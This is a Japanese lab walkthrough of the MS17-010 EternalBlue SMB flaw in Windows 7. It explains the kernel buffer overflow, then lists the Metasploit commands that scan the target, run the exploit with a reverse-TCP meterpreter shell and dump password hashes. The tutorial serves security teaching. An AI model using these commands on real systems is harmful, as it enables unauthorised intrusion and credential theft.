脆弱性の紹介
MS17-010の脆弱性は、FEA(ファイル拡張属性)変換を処理するときにWindows SMB v1のカーネルモード関数srv!SrvOs2FeaListToNtに現れ、大規模な非ページカーネルプールにバッファーオーバーフローがあります。
FEAリストをNTFEA(Windows NT FEA)リストに変換する前に、関数srv!SrvOs2FeaListToNtが呼び出されます。srv!SrvOs2FeaListSizeToNtは、変換されたFEAのサイズを計算します。計算のサイズが間違っているため、バッファオーバーフローが発生します。
ラボ環境
ここではAnjie.comの射撃場を使います
時間 | 192.168.0.3 |
---|---|
Windows7 | 192.168.0.2 |
エクスプロイト
nmapを開いてターゲットマシンをスキャンします
nmap -sV -Pn 192.168.0.2
ターゲットマシンは
135、139、445 などのポートを開いており、システムはwin7です。次に、msfを開きます。
msfconsole
metasploiteコマンドラインクライアントを開き、検索コマンドを使用して、ms17-010の脆弱性の関連モジュールを見つけます。
search ms17-010
これはターゲットの場所なので、直接使用できます
use exploit/windows/smb/ms17_010_eternalblue
構成情報を表示し、yesとマークされた属性を設定します
show options
ターゲットマシンのIPアドレスを設定する
set RHOSTS 192.168.0.2
その後、ペイロードペイロード(シェルコード)を選択します。ここでは、コンソールシェルのペイロードに接続することを選択します。
set payload windows/x64/meterpreter/reverse_tcp
同様に、負荷も構成する必要があります。オプションの構成情報を表示します。
構成にローカルホストLHOSTがありません。設定してください。
set LHOST 192.168.0.3
設定が完了したら、エクスプロイトを実行するか、を実行してエクスプロイトモジュールの実行を開始します
run
ターゲットホストからセッションセッションを正常に取得します
セッションセッションを正常に取得しました。今回は、meterpreterの後でペネトレーションモジュールの他の機能を引き続き紹介します。sysinfoを
実行して、ターゲットマシンの関連情報を表示します。
sysinfo
helpコマンドを実行すると、meterpreterの機能を理解するのに役立ちます
help
次に、ターゲットマシンのハッシュ値を取得し、
hashdump を実行します
hashdump
総括する
別のシンプルで充実した日!